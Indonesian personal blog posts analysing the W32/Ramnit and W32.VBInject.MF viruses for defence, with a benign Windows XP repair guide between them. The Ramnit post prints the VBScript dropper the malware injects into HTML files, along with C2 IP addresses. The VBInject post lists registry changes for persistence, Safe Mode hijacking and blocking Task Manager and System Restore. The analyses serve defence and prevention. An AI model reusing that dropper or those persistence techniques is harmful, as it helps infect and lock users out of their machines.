papanya afham

just sharing my life experiences

Welcome

Kamis, 17 Februari 2011

W32/Ramnit ke II

W32/Ramnit
Kini dengan kemampuan eksploitasi LNK (Shortcut)

Kalau Christiano Ronaldo di ibaratkan sebagai Stuxnet, tentu anda bertanya virus apa yang diibaratkan sebagai Messi ? Jawabannya adalah Ramnit. Walaupun tidak eksplosif seperti Stuxnet, namun dengan kemampuan yang tidak kalah dengan Stuxnet dalam injeksi file korbannya, Ramnit jelas menginfeksi banyak komputer di Indonesia dan pelan tapi pasti mengokohkan dirinya sebagai salah satu virus jawara yang pelru diwaspadai oleh pengguna komputer di Indonesia. Apalagi varian teranyar Ramnit yang sekarang memiliki kemampuan mengeksploitasi celah keamanan LNK (Shortcut) sehingga ia mampu menyebarkan dirinya dengan membuat Shortcut.

Di tahun 2010 lalu, dominasi stuxnet yang memanfaatkan celah keamanan LNK (shortcut) merupakan sebuah salah satu langkah kerja cerdas dari pembuat malware. Bukan hanya sekedar mendominasi, tetapi juga menjadi trending topik malware di berbagai artikel dan analisis di seluruh dunia.

Di saat dominasi stuxnet masih booming hingga saat ini, sebaiknya kita perlu waspada pula terhadap varian malware baru yang berusaha menunjukkan eksistensi-nya dengan usaha kerja keras dari pembuat malware. Diantara varian malware yang patut di waspadai adalah yang terdeteksi sebagai W32/Ramnit oleh Norman Security Suite (lihat gambar 1). Saat ini varian malware ramnit telah menyebar dengan cepat di seluruh dunia. Serangan ramnit ikut melengkapi dominasi malware mancanegara yang menyebar di Indonesia.
Gambar 1, Norman mendeteksi malware W32/Ramnit

Keluarga malware W32/Ramnit
Malware ramnit sesungguhnya bukanlah kelompok malware yang baru, melainkan sudah aktif menyebar pula di tahun 2010. Hanya karena adanya malware pengguna celah keamanan LNK seperti shortcut, sality, stuxnet, yang membuat malware ini tidak menjadi perhatian para analisis dan pengguna komputer di dunia.

Sama seperti stuxnet, varian pertama W32/Ramnit muncul pada pertengahan Juli dan Agustus 2010. Sedangkan varian kedua W32/Ramnit muncul pada Oktober dan Nopember 2010, bersamaan dengan heboh-nya serangan sality-shortcut. Dan pada pertengahan Januari 2011 saat ini yang muncul adalah varian ketiga dari keluarga W32/Ramnit yang mencoba mengikuti jejak para pendahulunya dengan menggunakan celah keamanan LNK (shortcut) untuk melakukan infeksi dan penyebaran.

Karakteristik W32/Ramnit
Salah satu hal yang membuat kita perlu hati-hati terhadap W32/Ramnit yaitu karena malware ini termasuk kelompok virus yang melakukan infeksi file seperti Sality, Virut dan Alman. Hal ini bisa menjadi momok buat pengguna komputer, karena akan sulit membersihkan virus yang melakukan infeksi file terutama file executable (application).

W32/Ramnit merupakan salah satu varian virus yang melakukan infeksi file executable (application). Dan tidak hanya file executable, tetapi juga melakukan infeksi terhadap file web (HTML) dan file DLL (dynamic load library).

Selain itu, jika anda terhubung ke internet, ramnit akan menghubungi remote server (IRC server) dan melakukan koneksi ke beberapa alamat server zombie untuk mendownload sekumpulan malware (virus, trojan, spyware). Pada beberapa waktu tertentu, W32/Ramnit menggunakan iklan dan popup dengan konten pornografi dan perjudian (casino) maupun iklan komersial lain yang tentunya membuat anda tidak nyaman saat hendak browsing maupun surfing. Bayangkan kalau hal ini terjadi pada saat anak anda yang dibawah umur sedang menggunakan komputer yang anda proteksi dengan Parental Control. Bagi orang tua ini bencana karena anak anda terpapar pornografi (karena kemungkinan besar konten porno yang ditampilkan akan lolos dari Parental Control yang di pasang) dan bagi anak hal ini bisa-bisa dianggap "berkah" karena proteksi pornografi yang di pasang ternyata bisa diakali.

Dengan turut memanfaatkan celah keamanan LNK (shortcut), maka makin mempermudah langkahnya untuk menginfeksi pengguna komputer dengan cepat. Walaupun tidak semua varian ketiga W32/Ramnit menggunakan celah keamanan LNK (shortcut), tetapi hampir semua varian W32/Ramnit akan sangat sulit dibersihkan.

Gejala & Efek W32/Ramnit
Beberapa gejala yang terjadi jika anda sudah terinfeksi yaitu :

  • Muncul pop-up iklan atau pop-up dengan konten pornografi/perjudian
    Dalam beberapa waktu tertentu, browser akan membuka pop-up iklan atau pop-up yang berisi konten pornografi atau perjudian (casino). Hal ini yang terkadang membuat pengguna komputer menjadi tidak nyaman. (lihat gambar 2)
Gambar 2, Pop-up iklan yang dijalankan W32/Ramnit

  • Muncul script error atau pop-up error setelah pop-up iklan yang muncul
    Setelah pop-up iklan yang muncul, akan muncul pop-up error atau script error dari browser. Muncul-nya script error ini mirip seperti virus "ARP Spoofing" pada tahun 2008. (lihat gambar 3)
    Gambar 3, Pop-up error atau script error

  • Infeksi file EXE dan DLL
    Sama seperti varian malware sality, alman dan virut, W32/Ramnit melakukan infeksi file exe. Hanya saja, W32/Ramnit juga melakukan infeksi terhadap file DLL (dynamic load library).
    File exe dan dll yang di-infeksi bertambah sekitar antara 100 - 120 kb, tergantung varian Ramnit yang menginfeksi. Meskipun begitu, tidak semua file exe dan dll yang di-infeksi.

  • Injeksi file HTML
    Selain menginfeksi file exe dan dll, W32/Ramnit juga melakukan injeksi terhadap file HTML. Injeksi dilakukan dengan menambahkan pada header dan footer. (lihat gambar 4 dan 5)
    Pada header, W32/Ramnit menambahkan script :
    DropFileName = "svchost.exe"
    Gambar 4, Script yang ditambahkan pada header file HTML
    Sedangkan pada footer, W32/Ramnit menambahkan script :
    Set FSO = CreateObject ("Scripting.FileSystemObject")
    DropPath = FSO.GetSpecialFolder(2) & '\" DropFileName
    If FSO.FileExists(DropPath)=False Then
    Set fileobj = FSO.CreateTextFile(DropPath, True)
    For i = 1 To Len(WriteData) Step2
    Fileobj.write chr (CLng("&H" & Mid(WriteData, i,2)))
    Next
    Fileobj.close
    End If
    Set WSHshell = CreateObject ("Wscript.shell")
    WSHshell.Run DropPath, 0
    Gambar 5, Script yang ditambahkan pada footer file HTML
  • Membuat fungsi services Windows menjadi blank
    Dengan aksi melakukan injeksi file pada file IEXPLORE.EXE dan file services.exe, serta menambahkan script pada file web (htm/html) membuat fungsi dari services Windows menjadi blank. (lihat gambar 6)
    Gambar 6, Fungsi Services Windows menjadi blank
  • Membuat komputer hang/lambat dan bahkan koneksi jaringan menjadi terputus.
    File sistem Windows yang akan menjadi sasaran injeksi W32/Ramnit yaitu :
  • C:\WINDOWS\system32\svchost.exe (file sistem yang berhubungan dengan koneksi jaringan, dengan menginjeksi akan membuat jaringan terputus)
  • C:\WINDOWS\system32\lsass.exe (file sistem yang berhubungan dengan aktifitas komputer, dengan menginjeksi akan membuat komputer hang/lambat).
  • C:\WINDOWS\system32\services.exe (file sistem yang berhubungan dengan services dan driver yang berjalan)
  • C:\Program Files\Internet Explorer\IEXPLORE.EXE (file executable dari browser internet explorer)

  • Aktif pada proses memory
    Malware W32/Ramnit mencoba melakukan koneksi ke Remote Server menggunakan Internet Explorer yang telah di injeksi. Hal ini bisa kita lihat pada proses task manager, walaupun kita tidak sedang membuka IE / Internet Explorer (lihat gambar 7)
    Gambar 7, Proses IEXPLORE.EXE (Internet Explorer) yang telah di-injeksi oleh W32/Ramnit
  • Melakukan koneksi ke Remote Server
    Malware W32/Ramnit melakukan koneksi ke Remote Server untuk melakukan pengiriman informasi yang dibutuhkan pada Remote Server. Remote Server yang digunakan yaitu diantara-nya :
195.2.252.247
195.2.252.252
69.50.193.157
74.125.227.17
74.125.227.18
74.125.227.20
95.211.127.69
  • Melakukan transfer data ke Remote Server
    Selain mencoba melakukan koneksi dan ber-komunikasi dengan remote server, W32/Ramnit juga mencoba melakukan transfer data dari komputer korban ke Remote Server dan sebaliknya mengirim file malware ke dalam komputer korban. (lihat gambar 8)
Gambar 8, Transfer data antara komputer korban dengan Remote Server

  • Melakukan broadcast
    Sama seperti hal-nya worm Conficker, W32/Ramnit juga melakukan broadacast pada jaringan. Yang ber-beda adalah untuk W32/Ramnit hanya melakukan pada satu alamat yaitu : ADX.ADNXS.COM (lihat gambar 9)
    Gambar 9, Broadcast yang dilakukan oleh W32/Ramnit

File virus W32/Ramnit
Malware W32/Ramnit dibuat menggunakan bahasa pemrograman C yang di kompress menggunakan UPX. File malware memiliki ciri sebagai berikut :
  • Berukuran 105 kb
  • Type file "Application'
  • Menggunakan icon "folder music"
  • Extension "exe"
Saat W32/Ramnit dijalankan, maka akan menginjeksi beberapa file sistem Windows yaitu :
  • C:\WINDOWS\system32\lsass.exe
  • C:\WINDOWS\system32\svchost.exe
  • C:\WINDOWS\system32\services.exe
  • C:\Program Files\Internet Explorer\IEXPLORE.EXE

Jika terkoneksi ke internet, W32/Ramnit akan mendownload beberapa file dan folder malware sebagai berikut :
  • C:\Documents and Settings\%user%\Local Settings\Temp\[angka].tmp
  • C:\Documents and Settings\%user%\Local Settings\Temp\explorer.dat
  • C:\Documents and Settings\%user%\Local Settings\Temp\winlogon.dat
  • C:\Documents and Settings\%user%\Local Settings\Temp\[nama_acak].exe
  • C:\Documents and Settings\%user%\Start Menu\Programs\[nama_acak].exe
  • C:\Program Files\Intenet Explorer\complete.dat
  • C:\Program Files\Intenet Explorer\dmlconf.dat
  • C:\Program Files\win\[angka_acak].exe
  • C:\Program Files\qwe
  • C:\WINDOWS\[nama_acak].exe
  • C:\WINDOWS\System32\[nama_acak].dll
  • C:\WINDOWS\System32\[nama&angka_acak].dll
  • C:\WINDOWS\Temp\[angka].tmp

Selain itu, W32/Ramnit melakukan injeksi terhadap beberapa file berikut (jika ada) yaitu :
  • C:\contacts.html
  • C:\Inetpub\wwwroot\index.html
  • C:\Program Files\Common Files\designer\MSADDNDR.DLL
  • C:\Program Files\Common Files\designer\MSHTMPGD.DLL
  • C:\Program Files\Common Files\designer\MSHTMPGR.DLL
  • C:\Program Files\Common Files\System\ado\MDACReadme.htm
  • C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL
  • C:\Program Files\MSN\MSNCoreFiles\OOBE\obelog.dll
  • C:\Program Files\MSN\MSNCoreFiles\OOBE\obemetal.dll
  • C:\Program Files\MSN\MSNCoreFiles\OOBE\obepopc.dll
  • C:\Program Files\MSN\MSNIA\custdial.dll
  • C:\Program Files\MSN\MSNIA\msniasvc.exe
  • C:\Program Files\MSN\MSNIA\prestp.exe
  • C:\Program Files\MSN\MsnInstaller\iasvcstb.dll
  • C:\Program Files\MSN\MsnInstaller\msdbxi.dll
  • C:\Program Files\MSN\MsnInstaller\msninst.dll
  • C:\Program Files\MSN\MsnInstaller\msninst.exe
  • C:\Program Files\MSN\MsnInstaller\msnsign.dll
  • C:\Program Files\NetMeeting\netmeet.htm

Selain itu pada removable disk/drive akan membuat beberapa file yaitu :
  • autorun.inf
  • Copy of Shortcut to (1).lnk
  • Copy of Shortcut to (2).lnk
  • Copy of Shortcut to (3).lnk
  • Copy of Shortcut to (4).lnk
  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak1].exe
  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak2].exe
  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak3].exe
  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak4].exe
  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak5].exe
  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak6].exe
  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak7].exe
  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak8].exe
  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak9].exe
  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak10].exe
  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak11].exe
  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak1].cpl
  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak2].cpl
  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak3].cpl
  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak4].cpl
  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak5].cpl
  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak6].cpl
  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak7].cpl
  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak8].cpl
  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak9].cpl
  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak10].cpl
  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak11].cpl
  • RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak1].exe
  • RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak2].exe
  • RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak3].exe
  • RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak4].exe
  • RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak5].exe
  • RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak6].exe
  • RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak7].exe
  • RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak1].cpl
  • RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak2].cpl
  • RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak3].cpl
  • RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak4].cpl
  • RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak5].cpl
  • RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak6].cpl
  • RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak7].cpl

Serta pada jaringan yang menggunakan mapping drive, berusaha menginjeksi beberapa file yang memiliki nama berikut :
  • Blank.htm
  • Citrus Punch.htm
  • Clear Day.htm
  • Fiesta.htm
  • Ivy.htm
  • Leaves.htm
  • Maize.htm
  • Nature.htm
  • Network Blitz.htm
  • Pie Charts.htm
  • Sunflower.htm
  • Sweets.htm
  • Technical.htm

Modifikasi Registry
Beberapa modifikasi registry yang dilakukan oleh worm Stuxnet antara lain sebagai berikut :
  • Menambah Registry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
[nama_acak] = C:\Documents and Settings\%user%\Local Settings\Temp\[nama_acak].exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60\0000\Control
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\featurecontrol
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\featurecontrol\FEATURE_BROWSER_EMULATION
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\international

  • Menghapus Registry
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRes tore]
DisableSR = 0x00000001

  • Merubah Registry
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
CurrentLevel =
1601 =

Metode Penyebaran
Beberapa cara W32/Ramnit melakukan penyebaran yaitu sebagai berikut :
  • Drive by download (exploit)
    W32/Ramnit awalnya menyebar dengan memanfaatkan fitur drive by download pada system Windows. Dengan link-link yang tersebar pada forum atau e-mail, berusaha mengelabui user untuk menjalankan link tersebut. Selain itu juga saat akses pada website-website yang menyediakan konten atau plugin browser untuk di-download.
  • Removable drive/disk
Metode ini adalah metode yang umum dilakukan oleh para pengguna komputer. W32/Ramnit membuat banyak file agar menginfeksi komputer, serta ikut pula memanfaatkan celah keamanan LNK (shortcut). (lihat gambar 10)
Gambar 10, W32/Ramnit menginfeksi removable disk/drive
  • Jaringan
    W32/Ramnit berusaha melakukan injeksi terhadap beberapa file web (htm) tertentu di jaringan pada komputer yang melakukan mapping drive. Berikut file-file tersebut :
    • Blank.htm
    • Citrus Punch.htm
    • Clear Day.htm
    • Fiesta.htm
    • Ivy.htm
    • Leaves.htm
    • Maize.htm
    • Nature.htm
    • Network Blitz.htm
    • Pie Charts.htm
    • Sunflower.htm
    • Sweets.htm
    • Technical.htm

Tips Pencegahan dari Malware W32/Ramnit
  1. Aktifkan Windows Firewall atau gunakan software firewall yang lain. Hal ini untuk mencegah dari akses yang tidak di-inginkan
  1. Pastikan komputer sudah mendapatkan update terbaru dari system Windows. Untuk mempermudah gunakan update otomatis dari system seperti "Automatic Updates". Atau bisa juga dengan men-download patch terbaru dari website Microsoft.
  1. Gunakan antivirus yang selalu terupdate dengan baik. Hal ini untuk mempermudah terhadap varian-varian dari malware yang baru.
  1. Batasi akses terhadap akses administrator. Bagi pengguna Windows 7 dan Vista, pastikan UAC (user account control) telah berjalan dengan baik.
  1. Berhati-hati saat membuka file attachment e-mail atau saat menerima transfer file dari orang yang tidak dikenal. Pastikan selalu di scan dengan antivirus yang terupdate.
  2. Berhati-hati terhadap program crack/keygen atau program-program yang tidak dikenal. Karena bisa saja sudah terinfeksi atau mengandung malware.
  3. Gunakan password yang tidak mudah dibaca dan diketahui. Pastikan selalu rubah password pada waktu-tertentu, dan bedakan password satu dengan lain-nya.
  4. Matikan fitur "autoplay" Windows untuk mencegah program yang tidak diinginkan pada removable drive/disk berjalan secara otomatis
  5. Matikan file sharing jika tidak digunakan. Jika memang menggunakan file sharing hanya berstatus read-only, atau konfigurasi sharing hanya untuk user-user tertentu.
Berhati-hati saat mengakses sebuah website atau forum yang menyediakan link-link tertentu untuk di-download atau di-install

sumber : vaksin.com
Diposting oleh iwan s di 3:54:00 PM 0 komentar
Label: , ,

Kamis, 10 Februari 2011

repair windows (tanpa install ulang)

1. Memperbaiki Instalasi (Repair Install)

Jika Windows XP Anda rusak (corrupted) dimana Anda tidak mempunyai sistem operasi lain untuk booting, Anda dapat melakukan perbaikan instalasi (Repair Install) yang bekerja sebagaimana setting (pengaturan) yang awal.

- Pastikan Anda mempunyai kunci (key) Windows XP yang valid.
- Keseluruhan proses akan memakan waktu kurang lebih 1/2 atau 1 jam, tergantung spek komputer Anda.
- Jika Anda dimintai password administrator, sebaiknya Anda memilih opsi perbaikan (repair) yang kedua,
bukan yang pertama.
- Masukkan CD Windows XP Anda dan lakukan booting dari CD tersebut.
- Ketika sudah muncul opsi perbaikan kedua R=Repair, tekan tombol R Ini akan memulai perbaikan.
- Tekan tombol F8 untuk menyetujui proses selanjutnya "I Agree at the Licensing Agreement"
- Tekan tombol R saat direktori tempat Windows XP Anda terinstal. Biasanya C:\WINDOWS Selanjutnya akan dilakukan pengecekan drive C: dan mulai menyalin file-file. Dan secara otomatis restart jika diperlukan. Biarkan CD Anda dalam drivenya.
- Berikutnya Anda akan melihat sebuah gambar "progress bar" yang merupakan bagian dari perbaikan, dia nampak seperti instalasi XP normal biasanya, meliputi "Collecting Information, Dynamic Update, Preparing Installation, Installing Windows, Finalizing Installation".
- Ketika ditanya, klik tombol Next
- Ketika ditanya untuk memasukkan kunci, masukkan kunci (key) Windows XP Anda yang valid.
- Normalnya Anda menginginkan tetap berada dalam nama Domain atau Workgroup yang sama.
- Komputer akan restart.
- Kemudian Anda akan mempunyai layar yang sama sebagaimana pengaktifan sistem ketika instalasi normal.
- Register jika Anda menginginkannya (biasanya tidak diperlukan).
- Selesai

2. NTOSKRNL Rusak atau Hilang (Missing or Corrupt)

Jika Anda mendapati pesan error bahwa "NTOSKRNL not found" / NTOSKRNL tak ditemukan, lakukan:
- Masukkan CD Windows XP dan booting dari CD tersebut.
- Pada saat muncul opsi R=Repair yang pertama, tekan tombol R.
- Tekan angka sesuai dengan lokasi instalasi Windows yang ingin diperbaiki yang sesuai.
- Biasanya #1
- Pindahlah ke drive CD Drive Anda berada.
- Tulis: CD i386
- Tulis: expand ntkrnlmp.ex_ C:\Windows\System32\ntoskrnl.exe
- Jika Windows XP Anda terinstal di tempat lain, maka ubahlah sesuai dengan lokasinya.
- Keluarkan CD Anda dan ketikkan EXIT

3. HAL.DLL Rusak atau Hilang (Missing or Corrupt)

Jika Anda mendapatkan error berkenaan dengan rusak atau hilangnya file hal.dll, ada kemungkinan file BOOT.INI mengalami salah konfigurasi (misconfigured).

- Masukkan CD Windows XP dan booting dari CD tersebut.
- Pada saat muncul opsi R=Repair yang pertama, tekan tombol R.
- Tekan angka sesuai dengan lokasi instalasi Windows yang ingin diperbaiki yang sesuai.
- Biasanya #1
- Tulis: bootcfg /list : Menampilkan isi/masukan pada file BOOT.INI saat ini
- Tulis: bootcfg /rebuild : Memperbaiki konfigurasi dari file BOOT.INI
- Keluarkan CD Anda dan ketikkan EXIT

4. Direktori \WINDOWS\SYSTEM32\CONFIG rusak atau hilang

Jika Anda mendapatkan error dengan tulisan:

"Windows could not start because the following files is missing or corrupt \WINDOWS\SYSTEM32\CONFIG\SYSTEM or \WINDOWS\SYSTEM32\CONFIG\SOFTWARE"

- Masukkan CD Windows XP dan booting dari CD tersebut.
- Pada saat muncul opsi R=Repair yang pertama, tekan tombol R.
- Tekan angka sesuai dengan lokasi instalasi Windows yang ingin diperbaiki yang sesuai.
- Biasanya #1
- Masukkan password administrator jika diperlukan.
- Tulis: cd \windows\system32\config
- Berikutnya tergantung di bagian mana letak terjadinya kerusakan:
- Tulis: ren software software.rusak ATAU ren system system.rusak
- Berikutnya lagi juga tergantung di bagian mana letak terjadinya kerusakan:
- Tulis: copy \windows\repair\system
- Tulis: copy \windows\repair\software
- Keluarkan CD Anda dan ketikkan EXIT



5. NTLDR atau NTDETECT.COM tak ditemukan (NTLDR or NTDETECT.COM Not Found)

Jika Anda mendapati error bahwa NTLDR tak ditemukan saat booting:

a. Untuk partisi tipe FAT
- Silakan Anda melakukan booting dari disket Win98 Anda dan salinlah file NTLDR atau NTDETECT.COM dari direktori i386 ke drive induk/akar (root) C:\

b. Untuk partisi tipe NTFS
- Masukkan CD Windows XP dan booting dari CD tersebut.
- Pada saat muncul opsi R=Repair yang pertama, tekan tombol R.
- Tekan angka sesuai dengan lokasi instalasi Windows yang ingin diperbaiki yang sesuai.
- Biasanya #1
- Masukkan password administrator jika diperlukan.
- Masukkan perintah berikut, dimana X: adalah alamat drive dari CD ROM Anda (Sesuaikan!).
- Tulis: COPY X:\i386\NTLDR C\:
- Tulis: COPY X:\i386\NTDETECT.COM C:\
- Keluarkan CD Anda dan ketikkan EXIT
Diposting oleh iwan s di 4:25:00 PM 0 komentar
Label: ,

Rabu, 02 Februari 2011

W32.VBInject.MF

Jangan Bunuh Saya Biarkan Saya Hidup Di Komputer Anda.
Saya Sudah Tidak Punya  Tempat Lagi Untuk Hidup. Saya Tidak Menggagu System Anda Terima Kasih.
Salam Bocah Ndeso.
Sragen L0r0471 Community



Walaupun penyebaran virus beberapa bulan ini masih di dominasi oleh virus mancanegara, tetapi bukan berarti “tangan-tangan jahil” berhenti berkreasi membuat virus, tema yang di usungpun tidak terlepas dari ciri khas yang selalu melekat pada virus lokal yakni seputar kisah asmara seperti yang dilakukan oleh salah satu virus lokal ini.
Virus ini mempunyai ukuran yang cukup besar sekitar 232 KB dengan tetap mengusung program Bahasa Visual Basic. Untuk mengelabui user ia akan menyertakan sebuah icon  dengan tipe file “Application”serta menyamarkan dirinya sebagai sebuah program permainan (GameHouse) dari “KraiSoft Entertainment”. (lihat gambar 1)

Gambar 1, File induk W32/VBInject.MF

Secara umum, virus ini tergolong virus jinak karena tidak melakukan perusakan terhadap data, tetapi virus ini cukup merepotkan dan menyebabkan komputer korban menjadi lambat karena ia akan mengaktifkan dirinya serta menampilkan  pesan secara otomatis pada waktu yang telah ditentukan. Sebagai bentuk pertahanan ia akan mematikan beberapa fungsi Windows yang terkenal seperri Task Manager, Regedit, System Restore ataupun Folder Options serta blok akses Safe Mode serta Safe Mode with Command Prompt. Hal yang melegakan karena virus ini tidak akan menyembunyikan atau menghapus file baik yang berada di Hard Disk maupun di Flash Disk.
File induk virus
Pada saat virus tersebut menginfeksi komputer korban, ia akan membuat beberapa file induk berikut yang akan dijalankan secara otomatis pada saat komputer diaktifkan.
Berikut beberapa file yang akan dibuat oleh virus:
  • C:\Windows\system32\Windows.vbs
  • C:\windows\system32\oeminfo.ini
  • %Drive%:\L0r0471.doc (%Drive%, menunjukan lokasi drive)
  • C:\Documents and Settings\All Users\Desktop\L0r0471.doc
  • C:\Windows\System32\4n174L0r0471.exe
  • %Drive%:\SexyGame.exe dan autorun.inf (%Drive%, menunjukan lokasi drive)
Registry Windows
Agar file tersebut dapat di aktifkan secara otomatis pada saat komputer di aktifkan, ia akan membuat string pada registri berikut:
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    • WindowsProtect = C:\Windows\System32\4n174L0r0471.exe
    • WindowsUpdate = C:\Windows\System32\Windows.vbs
Blok fungsi windows
Sebagai pertahanan agar tidak mudah dibasmi oleh user, ia akan berupaya untuk blok beberapa fungsi Windows seperti Task Manager, CMD, System Restore, Folder Options, Regedit atau RUN dengan membuat beberapa string pada registry berikut:
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
    • NoFind
    • NoFolderOptions
    • NoRun
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
o   DisableRegistryTools
o   DisableTaskMgr
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
o   DisableMSI
o   LimitSystemRestoreCheckpointing
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore
o   DisableConfig
o   DisableSR
Selain menghilangkan menu “Folder Options”, ia akan mempersulit user untuk menampilkan file yang tersembunyi sehingga semakin mempersulit untuk menghapus file induk virus tersebut, untuk melakukan hal ini ia akan melakukan perubahan pada registry berikut:
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden
    • CheckedValue = 0
    • DefaultValue = 0
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt
    • CheckedValue = 1
    • DefaultValue = 1
Aktif pada pada mode “Safe Mode with Command Prompt”
Pembersihan pada mode “Safe Mode atau Safe Mode with Command Prompt” bukan merupakan jaminan dapat melumpuhkan virus tersebut karena metode tersebut sudah diketahui oleh pembuat virus sehingga dapat diatasi dengan melakukan perubahan pada string registri sehingga virus akan tetap aktif walaupun komputer boot pada mode “safe mode” atau “safe mode with command prompt”
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot
    • AlternateShell = C:\Windows\System32\4n174L0r0471.exe
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\SafeBoot
    • AlternateShell = C:\Windows\System32\4n174L0r0471.exe
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot
    • AlternateShell = C:\Windows\System32\4n174L0r0471.exe
Blok akses Safe mode
Tidak tanggung-tanggung, virus ini juga akan blok akses safe mode dan safe mode with command prompt dengan menghapus beberapa registri berikut
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vgasave.sys\
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vga.sys\
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\sr.sys\
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\sermouse.sys\
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmload.sys
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmio.sys\
